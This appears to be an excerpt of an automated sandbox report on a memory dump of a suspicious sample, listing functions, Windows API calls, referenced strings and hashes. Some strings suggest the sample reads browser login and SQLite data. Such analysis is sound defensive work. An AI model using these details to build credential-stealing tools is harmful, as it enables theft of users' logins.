                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy$memset
                                                      • String ID: -journal$-wal
                                                      • API String ID: 438689982-2894717839
                                                      • Opcode ID: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                      • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                      • Opcode Fuzzy Hash: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                      • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                      • EndDialog.USER32(?,00000002), ref: 00405C83
                                                      • EndDialog.USER32(?,00000001), ref: 00405C98
                                                        • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                        • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                      • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Item$Dialog$MessageSend
                                                      • String ID:
                                                      • API String ID: 3975816621-0
                                                      • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                      • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                      • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                      • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                      APIs
                                                      • _wcsicmp.MSVCRT ref: 00444D09
                                                      • _wcsicmp.MSVCRT ref: 00444D1E
                                                      • _wcsicmp.MSVCRT ref: 00444D33
                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmp$wcslen$_memicmp
                                                      • String ID: .save$http://$https://$log profile$signIn
                                                      • API String ID: 1214746602-2708368587
                                                      • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                      • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                      • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                      • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                      • memset.MSVCRT ref: 00405E33
                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                      • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                      • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                      • String ID:
                                                      • API String ID: 2313361498-0
                                                      • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                      • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                      • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                      • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                      APIs
                                                      • GetClientRect.USER32(?,?), ref: 00405F65
                                                      • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                      • GetWindow.USER32(00000000), ref: 00405F80
                                                        • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                      • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                      • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                      • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMessageRectSend$Client
                                                      • String ID:
                                                      • API String ID: 2047574939-0
                                                      • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                      • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                      • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                      • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                      APIs
                                                      • GetSystemTime.KERNEL32(?), ref: 00418836
                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                      • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                      • GetTickCount.KERNEL32 ref: 0041887D
                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                      • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                      • String ID:
                                                      • API String ID: 4218492932-0
                                                      • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                      • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                      • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                      • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                      APIs
                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                      • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy$memset
                                                      • String ID: gj
                                                      • API String ID: 438689982-4203073231
                                                      • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                      • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                      • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                      • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                      APIs
                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy
                                                      • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                      • API String ID: 3510742995-2446657581
                                                      • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                      • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                      • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                      • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                      • memset.MSVCRT ref: 00405ABB
                                                      • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                      • SetFocus.USER32(?), ref: 00405B76
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$FocusItemmemset
                                                      • String ID:
                                                      • API String ID: 4281309102-0
                                                      • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                      • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                      • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                      • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _snwprintfwcscat
                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                      • API String ID: 384018552-4153097237
                                                      • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                      • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                      • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                      • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                                      • String ID: 0$6
                                                      • API String ID: 2029023288-3849865405
                                                      • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                      • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                      • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                      • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                      APIs
                                                        • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                      • memset.MSVCRT ref: 00405455
                                                      • memset.MSVCRT ref: 0040546C
                                                      • memset.MSVCRT ref: 00405483
                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$memcpy$ErrorLast
                                                      • String ID: 6$\
                                                      • API String ID: 404372293-1284684873
                                                      • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                      • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                      • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                      • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                      APIs
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                      • wcscpy.MSVCRT ref: 0040A0D9
                                                      • wcscat.MSVCRT ref: 0040A0E6
                                                      • wcscat.MSVCRT ref: 0040A0F5
                                                      • wcscpy.MSVCRT ref: 0040A107
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                      • String ID:
                                                      • API String ID: 1331804452-0
                                                      • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                      • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                      • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                      • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                      APIs
                                                        • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                      • String ID: advapi32.dll
                                                      • API String ID: 2012295524-4050573280
                                                      • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                      • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                      • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                      • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                      APIs
                                                      Strings
                                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                      • <?xml version="1.0" ?>, xrefs: 0041007C
                                                      • <%s>, xrefs: 004100A6
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$_snwprintf
                                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                      • API String ID: 3473751417-2880344631
                                                      • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                      • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                      • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                      • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: wcscat$_snwprintfmemset
                                                      • String ID: %2.2X
                                                      • API String ID: 2521778956-791839006
                                                      • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                      • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                      • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                      • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _snwprintfwcscpy
                                                      • String ID: dialog_%d$general$menu_%d$strings
                                                      • API String ID: 999028693-502967061
                                                      • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                      • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                      • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                      • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                      APIs
                                                      • strlen.MSVCRT ref: 00408DFA
                                                        • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                      • memset.MSVCRT ref: 00408E46
                                                      • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                      • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                      • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                      • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
